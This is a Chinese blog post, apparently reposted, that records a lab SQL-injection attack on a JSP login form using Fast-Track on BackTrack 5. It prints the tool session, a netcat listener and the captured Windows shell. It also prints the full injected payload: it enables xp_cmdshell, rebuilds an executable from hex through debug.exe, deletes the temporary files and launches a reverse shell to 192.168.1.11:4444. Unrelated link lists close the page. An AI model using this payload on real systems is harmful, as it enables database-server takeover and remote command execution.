SQL Injector - POST Parameter Attack
来源:互联网 发布:docking station知乎 编辑:程序博客网 时间:2024/05/20 20:59
login.jsp如下:
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Register user</title></head><body><form action="login" method="post">username:<input type="text" name="username"><br>password:<input type="password" name="password"><br><input type="submit" value="login"></form></body></html>
bt5上操作如下:
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks... ********************************************************* FreeTDS and PYMMSQL are installed. (Check) ****** PExpect is installed. (Check) ****** ClientForm is installed. (Check) ****** Psyco is installed. (Check) ****** Beautiful Soup is installed. (Check) ***Also ensure ProFTP, WinEXE, and SQLite3 is installed fromthe Updates/Installation menu.Your system has all requirements needed to run Fast-Track! ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** *****************************************************************Fast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL Tools 5. Mass Client-Side Attack 6. Exploits 7. Binary to Hex Payload Converter 8. Payload Generator 9. Fast-Track Tutorials 10. Fast-Track Changelog 11. Fast-Track Credits 12. Exit Fast-Track Enter the number: 4 ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** *****************************************************************Microsoft SQL Attack Tools 1. MSSQL Injector 2. MSSQL Bruter 3. SQLPwnage (q)uit Enter your choice : 1 ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** *****************************************************************Enter which SQL Injector you want to use: 1. SQL Injector - Query String Parameter Attack 2. SQL Injector - POST Parameter Attack 3. SQL Injector - GET FTP Payload Attack 4. SQL Injector - GET Manual Setup Binary Payload Attack (q)uit Enter your choice: 2 ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** ***************************************************************** This portion allows you to attack all forms on a specific website without having to specify each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter looking for both error based injection as well as blind based SQL injection. Simply type the website you want to attack, and let it roll. Example: http://www.sqlinjectablesite.com/index.aspx <ctrl>-c to exit to Main Menu... Enter the URL to attack: http://192.168.1.109:8080/mssql2k/login.jsp/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayloadpost.py:58: DeprecationWarning: os.popen2 is deprecated. Use the subprocess module. ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null') Forms detected...attacking the parameters in hopes of exploiting SQL Injection.. Sending payload to parameter: username Sending payload to parameter: password [-] The PAYLOAD is being delivered. This can take up to two minutes. [-]另一个bash起nc:
root@bt:~# nc -l -p 4444
很快获得了cmdshell:
root@bt:~# nc -l -p 4444Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\WINDOWS\system32>cd ..cd ..C:\WINDOWS>cd ..cd ..C:\>dirdir 驱动器 C 中的卷没有标签。 卷的序列号是 3052-FA52 C:\ 的目录2012-03-24 11:55 0 AUTOEXEC.BAT2012-03-24 11:55 0 CONFIG.SYS2012-03-24 11:59 <DIR> Documents and Settings2013-07-02 21:45 <DIR> msf32012-08-07 03:10 176,204,554 msf3.zip2004-12-29 13:07 61,440 nc.exe2013-07-01 22:45 <DIR> Program Files2013-05-01 22:15 16,232,448 python-2.7.4.msi2013-07-06 17:57 <DIR> Python272013-04-07 21:03 70,402,968 SQL2000SP4.exe2013-06-30 21:58 <DIR> SQL2KSP42013-06-30 21:53 <DIR> SQLEVAL2011-03-22 17:38 349,280,992 sqleval.exe2013-07-01 20:52 <DIR> WINDOWS2013-05-22 20:55 20,868,704 Wireshark-win32-1.8.7.exe 8 个文件 633,051,106 字节 7 个目录 3,908,493,312 可用字节C:\>exitexitroot@bt:~#
生成的SQL如下:
select username, password, phone from tb_user where username='';exec master..sp_addextendedproc "xp_cmdshell", "C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll";exec master..sp_configure "show advanced options", 1;RECONFIGURE;exec master..sp_configure "xp_cmdshell", 1;RECONFIGURE;exec master..xp_cmdshell 'echo n service.dll >1.txt';exec master..xp_cmdshell 'echo e 0100 >2.txt';exec master..xp_cmdshell 'echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 >3.txt';exec master..xp_cmdshell 'echo e 0180>4.txt';exec master..xp_cmdshell 'echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >5.txt' ;exec master..xp_cmdshell 'echo e 0200 >6.txt';exec master..xp_cmdshell 'echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13 >7.txt';exec master..xp_cmdshell 'echo e 0280 >8.txt';exec master..xp_cmdshell 'echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00 >9.txt';exec master..xp_cmdshell 'echo e 0300 >10.txt';exec master..xp_cmdshell 'echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1 >11.txt';exec master..xp_cmdshell 'echo e 0380 >12.txt' ;exec master..xp_cmdshell 'echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03 >13.txt';exec master..xp_cmdshell 'echo e 0400 >14.txt' ;exec master..xp_cmdshell 'echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee >15.txt';exec master..xp_cmdshell 'echo e 0480 >16.txt';exec master..xp_cmdshell 'echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74 >17.txt' ;exec master..xp_cmdshell 'echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74 >17.txt';exec master..xp_cmdshell 'echo e 0500 >18.txt';exec master..xp_cmdshell 'echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46 >19.txt';exec master..xp_cmdshell 'echo e 0580 >20.txt';exec master..xp_cmdshell 'echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00 >21.txt';exec master..xp_cmdshell 'echo r cx >22.txt';exec master..xp_cmdshell 'echo 04ef >23.txt';exec master..xp_cmdshell 'echo w >24.txt';exec master..xp_cmdshell 'echo q >25.txt';exec master..xp_cmdshell 'type 1.txt > reverse.txt';exec master..xp_cmdshell 'type 2.txt >> reverse.txt';exec master..xp_cmdshell 'type 3.txt >> reverse.txt';exec master..xp_cmdshell 'type 4.txt >> reverse.txt';exec master..xp_cmdshell 'type 5.txt >> reverse.txt';exec master..xp_cmdshell 'type 6.txt >> reverse.txt';exec master..xp_cmdshell 'type 7.txt >> reverse.txt';exec master..xp_cmdshell 'type 8.txt >> reverse.txt';exec master..xp_cmdshell 'type 9.txt >> reverse.txt';exec master..xp_cmdshell 'type 10.txt >> reverse.txt';exec master..xp_cmdshell 'type 11.txt >> reverse.txt';exec master..xp_cmdshell 'type 12.txt >> reverse.txt';exec master..xp_cmdshell 'type 13.txt >> reverse.txt';exec master..xp_cmdshell 'type 14.txt >> reverse.txt';exec master..xp_cmdshell 'type 15.txt >> reverse.txt';exec master..xp_cmdshell 'type 16.txt >> reverse.txt';exec master..xp_cmdshell 'type 17.txt >> reverse.txt';exec master..xp_cmdshell 'type 18.txt >> reverse.txt';exec master..xp_cmdshell 'type 19.txt >> reverse.txt';exec master..xp_cmdshell 'type 20.txt >> reverse.txt';exec master..xp_cmdshell 'type 21.txt >> reverse.txt';exec master..xp_cmdshell 'type 22.txt >> reverse.txt';exec master..xp_cmdshell 'type 23.txt >> reverse.txt';exec master..xp_cmdshell 'type 24.txt >> reverse.txt';exec master..xp_cmdshell 'type 25.txt >> reverse.txt';exec master..xp_cmdshell 'debug<reverse.txt';exec master..xp_cmdshell 'copy service.dll reverse.exe';exec master ..xp_cmdshell 'del 1.txt';exec master ..xp_cmdshell 'del 2.txt';exec master ..xp_cmdshell 'del 3.txt';exec master ..xp_cmdshell 'del 4.txt';exec master ..xp_cmdshell 'del 5.txt';exec master ..xp_cmdshell 'del 6.txt';exec master ..xp_cmdshell 'del 7.txt';exec master ..xp_cmdshell 'del 8.txt';exec master ..xp_cmdshell 'del 9.txt';exec master ..xp_cmdshell 'del 10.txt';exec master ..xp_cmdshell 'del 11.txt';exec master ..xp_cmdshell 'del 12.txt';exec master ..xp_cmdshell 'del 13.txt';exec master ..xp_cmdshell 'del 14.txt';exec master ..xp_cmdshell 'del 15.txt';exec master ..xp_cmdshell 'del 16.txt';exec master ..xp_cmdshell 'del 17.txt';exec master ..xp_cmdshell 'del 18.txt';exec master ..xp_cmdshell 'del 19.txt';exec master ..xp_cmdshell 'del 20.txt';exec master ..xp_cmdshell 'del 21.txt';exec master ..xp_cmdshell 'del 22.txt';exec master ..xp_cmdshell 'del 23.txt';exec master ..xp_cmdshell 'del 24.txt';exec master ..xp_cmdshell 'del 25.txt';exec master ..xp_cmdshell 'del reverse.txt';exec master ..xp_cmdshell 'del service.dll';exec master..xp_cmdshell 'reverse.exe 192.168.1.11 4444'--' and password='';exec master..sp_addextendedproc "xp_cmdshell", "C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll";exec master..sp_configure "show advanced options", 1;RECONFIGURE;exec master..sp_configure "xp_cmdshell", 1;RECONFIGURE;exec master..xp_cmdshell 'echo n service.dll >1.txt';exec master..xp_cmdshell 'echo e 0100 >2.txt';exec master..xp_cmdshell 'echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 >3.txt';exec master..xp_cmdshell 'echo e 0180>4.txt';exec master..xp_cmdshell 'echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >5.txt' ;exec master..xp_cmdshell 'echo e 0200 >6.txt';exec master..xp_cmdshell 'echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13 >7.txt';exec master..xp_cmdshell 'echo e 0280 >8.txt';exec master..xp_cmdshell 'echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00 >9.txt';exec master..xp_cmdshell 'echo e 0300 >10.txt';exec master..xp_cmdshell 'echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1 >11.txt';exec master..xp_cmdshell 'echo e 0380 >12.txt' ;exec master..xp_cmdshell 'echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03 >13.txt';exec master..xp_cmdshell 'echo e 0400 >14.txt' ;exec master..xp_cmdshell 'echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee >15.txt';exec master..xp_cmdshell 'echo e 0480 >16.txt';exec master..xp_cmdshell 'echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74 >17.txt' ;exec master..xp_cmdshell 'echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74 >17.txt';exec master..xp_cmdshell 'echo e 0500 >18.txt';exec master..xp_cmdshell 'echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46 >19.txt';exec master..xp_cmdshell 'echo e 0580 >20.txt';exec master..xp_cmdshell 'echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00 >21.txt';exec master..xp_cmdshell 'echo r cx >22.txt';exec master..xp_cmdshell 'echo 04ef >23.txt';exec master..xp_cmdshell 'echo w >24.txt';exec master..xp_cmdshell 'echo q >25.txt';exec master..xp_cmdshell 'type 1.txt > reverse.txt';exec master..xp_cmdshell 'type 2.txt >> reverse.txt';exec master..xp_cmdshell 'type 3.txt >> reverse.txt';exec master..xp_cmdshell 'type 4.txt >> reverse.txt';exec master..xp_cmdshell 'type 5.txt >> reverse.txt';exec master..xp_cmdshell 'type 6.txt >> reverse.txt';exec master..xp_cmdshell 'type 7.txt >> reverse.txt';exec master..xp_cmdshell 'type 8.txt >> reverse.txt';exec master..xp_cmdshell 'type 9.txt >> reverse.txt';exec master..xp_cmdshell 'type 10.txt >> reverse.txt';exec master..xp_cmdshell 'type 11.txt >> reverse.txt';exec master..xp_cmdshell 'type 12.txt >> reverse.txt';exec master..xp_cmdshell 'type 13.txt >> reverse.txt';exec master..xp_cmdshell 'type 14.txt >> reverse.txt';exec master..xp_cmdshell 'type 15.txt >> reverse.txt';exec master..xp_cmdshell 'type 16.txt >> reverse.txt';exec master..xp_cmdshell 'type 17.txt >> reverse.txt';exec master..xp_cmdshell 'type 18.txt >> reverse.txt';exec master..xp_cmdshell 'type 19.txt >> reverse.txt';exec master..xp_cmdshell 'type 20.txt >> reverse.txt';exec master..xp_cmdshell 'type 21.txt >> reverse.txt';exec master..xp_cmdshell 'type 22.txt >> reverse.txt';exec master..xp_cmdshell 'type 23.txt >> reverse.txt';exec master..xp_cmdshell 'type 24.txt >> reverse.txt';exec master..xp_cmdshell 'type 25.txt >> reverse.txt';exec master..xp_cmdshell 'debug<reverse.txt';exec master..xp_cmdshell 'copy service.dll reverse.exe';exec master ..xp_cmdshell 'del 1.txt';exec master ..xp_cmdshell 'del 2.txt';exec master ..xp_cmdshell 'del 3.txt';exec master ..xp_cmdshell 'del 4.txt';exec master ..xp_cmdshell 'del 5.txt';exec master ..xp_cmdshell 'del 6.txt';exec master ..xp_cmdshell 'del 7.txt';exec master ..xp_cmdshell 'del 8.txt';exec master ..xp_cmdshell 'del 9.txt';exec master ..xp_cmdshell 'del 10.txt';exec master ..xp_cmdshell 'del 11.txt';exec master ..xp_cmdshell 'del 12.txt';exec master ..xp_cmdshell 'del 13.txt';exec master ..xp_cmdshell 'del 14.txt';exec master ..xp_cmdshell 'del 15.txt';exec master ..xp_cmdshell 'del 16.txt';exec master ..xp_cmdshell 'del 17.txt';exec master ..xp_cmdshell 'del 18.txt';exec master ..xp_cmdshell 'del 19.txt';exec master ..xp_cmdshell 'del 20.txt';exec master ..xp_cmdshell 'del 21.txt';exec master ..xp_cmdshell 'del 22.txt';exec master ..xp_cmdshell 'del 23.txt';exec master ..xp_cmdshell 'del 24.txt';exec master ..xp_cmdshell 'del 25.txt';exec master ..xp_cmdshell 'del reverse.txt';exec master ..xp_cmdshell 'del service.dll';exec master..xp_cmdshell 'reverse.exe 192.168.1.11 4444'--'
一开始没成功,老是报:
Sorry, they probably aren't suseptible...printing error message:
怀疑是python的代码问题,后来才发现是login.jsp的问题,因为一开始是这样的:
<form action="login">username:<input type="text" name="username"><br>password:<input type="password" name="password"><br><input type="submit" value="login"></form>
如果没有method,默认就是GET,而不是POST,我在调试python的时候,发现了这个问题。还蛮顺利的。
- SQL Injector - POST Parameter Attack
- MSSQL2K - SQL Injector - Query String Parameter Attack
- MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
- MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
- SQL Injector - GET Manual Setup Binary Payload Attack
- @Injector
- SQL Injection Attack
- SQL injection attack
- Attack
- Attack
- Parameter SQL 参数类
- 反制SQL注入的方案(SQL Injection Attack)
- angular.injector
- SQL Injection: Modes of Attack, Defence, and Why It Matters
- SQL Injection(二)――Hex Attack
- How to Prevent SQL Injection Attack (Explained with an Example)
- Locate and Attack Domain SQL Servers without Scanning
- Parameter
- ajax向后台传中文乱码问题
- 黑马程序员----面向对象之“类”
- 孙鑫VC++深入详解:Lesson8 Part1---"逃跑"按钮的实现
- 转换进制算法
- 黑马程序员--线程
- SQL Injector - POST Parameter Attack
- 一些有意思的代码
- hdu3468 最大流/二分匹配+BFS
- 给定链表的头指针和一个结点指针,在O(1)时间删除该结点。
- 644 - Immediate Decodability
- 缓存清除策略(1)
- hdu 1166 敌兵布阵
- JAVA Web学习之Web 开发入门
- UVA 10994 Simple Addition
